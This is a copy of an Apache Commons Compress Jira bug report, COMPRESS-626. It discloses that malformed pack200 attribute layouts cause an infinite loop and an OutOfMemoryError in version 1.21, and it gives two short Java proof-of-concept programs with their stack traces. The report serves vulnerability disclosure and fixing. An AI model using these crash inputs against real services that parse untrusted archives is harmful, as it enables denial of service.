You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@commons.apache.org by "Andrii Hudz (Jira)" <ji...@apache.org> on 2022/09/29 08:38:00 UTC

[jira] [Created] (COMPRESS-626) OutOfMemoryError on malformed pack200 attributes

Andrii Hudz created COMPRESS-626:
------------------------------------

             Summary: OutOfMemoryError on malformed pack200 attributes
                 Key: COMPRESS-626
                 URL: https://issues.apache.org/jira/browse/COMPRESS-626
             Project: Commons Compress
          Issue Type: Bug
          Components: Archivers
    Affects Versions: 1.21
         Environment: ubuntu18

java-11-openjdk-amd64
            Reporter: Andrii Hudz
         Attachments: sample-1.0-SNAPSHOT-vulnerable-pack200.jar

pack200.NewAttributeBands.getStreamUpToMatchingBracket() and unpack200.NewAttributeBands.getStreamUpToMatchingBracket can result in an infinite loop that finally leads to an out of memory error.

pack example:
{code:java}
import org.apache.commons.compress.harmony.pack200.AttributeDefinitionBands;
import org.apache.commons.compress.harmony.pack200.CPUTF8;
import org.apache.commons.compress.harmony.pack200.NewAttributeBands;

public class ApacheCompress_1_21_OutOfMemory {
    public static void main(String[] args) throws Exception {
        CPUTF8 name = new CPUTF8("");
        CPUTF8 layout = new CPUTF8("[");
        new NewAttributeBands(1, null, null,
                new AttributeDefinitionBands.AttributeDefinition(35, AttributeDefinitionBands.CONTEXT_CLASS, name, layout)
        );
    }
}{code}
{code:java}
Exception in thread "main" java.lang.OutOfMemoryError: Java heap space     at java.base/java.util.Arrays.copyOf(Arrays.java:3745)     at java.base/java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:172)     at java.base/java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:748)     at java.base/java.lang.StringBuffer.append(StringBuffer.java:429)     at org.apache.commons.compress.harmony.pack200.NewAttributeBands.getStreamUpToMatchingBracket(NewAttributeBands.java:822)     at org.apache.commons.compress.harmony.pack200.NewAttributeBands.readNextAttributeElement(NewAttributeBands.java:180)     at org.apache.commons.compress.harmony.pack200.NewAttributeBands.parseLayout(NewAttributeBands.java:95)     at org.apache.commons.compress.harmony.pack200.NewAttributeBands.<init>(NewAttributeBands.java:53)     at ApacheCompress_1_21_OutOfMemory.main(ApacheCompress_1_21_OutOfMemory.java:9)

{code}
 

unpack example on the malformed archive:
{code:java}
import org.apache.commons.compress.java.util.jar.Pack200;

public class ApacheCompress_1_21_OutOfMemory_unpack_demo {
    public static void main(String[] args) throws Exception {
        String input = "/sample-1.0-SNAPSHOT-vulnerable-pack200.jar";
        try (
                InputStream inputStream = ApacheCompress_1_21_OutOfMemory_unpack_demo.class.getResourceAsStream(input);
                JarOutputStream out = new JarOutputStream(new OutputStream() {
                    @Override
                    public void write(int i) {

                    }
                });
        ) {
            Pack200.newUnpacker().unpack(inputStream, out);
        }
    }
}{code}
{code:java}
Exception in thread "main" java.lang.OutOfMemoryError: Java heap space     at java.base/java.util.Arrays.copyOf(Arrays.java:3745)     at java.base/java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:172)     at java.base/java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:748)     at java.base/java.lang.StringBuffer.append(StringBuffer.java:429)     at org.apache.commons.compress.harmony.unpack200.NewAttributeBands.getStreamUpToMatchingBracket(NewAttributeBands.java:883)     at org.apache.commons.compress.harmony.unpack200.NewAttributeBands.readNextAttributeElement(NewAttributeBands.java:201)     at org.apache.commons.compress.harmony.unpack200.NewAttributeBands.parseLayout(NewAttributeBands.java:122)     at org.apache.commons.compress.harmony.unpack200.NewAttributeBands.<init>(NewAttributeBands.java:58)     at org.apache.commons.compress.harmony.unpack200.AttrDefinitionBands.read(AttrDefinitionBands.java:85)     at org.apache.commons.compress.harmony.unpack200.Segment.readSegment(Segment.java:353)     at org.apache.commons.compress.harmony.unpack200.Segment.unpackRead(Segment.java:459)     at org.apache.commons.compress.harmony.unpack200.Segment.unpack(Segment.java:436)     at org.apache.commons.compress.harmony.unpack200.Archive.unpack(Archive.java:156)     at org.apache.commons.compress.harmony.unpack200.Pack200UnpackerAdapter.unpack(Pack200UnpackerAdapter.java:49)     at ApacheCompress_1_21_OutOfMemory_unpack_demo.main(ApacheCompress_1_21_OutOfMemory_unpack_demo.java:20)Process finished with exit code 1
{code}



--
This message was sent by Atlassian Jira
(v8.20.10#820010)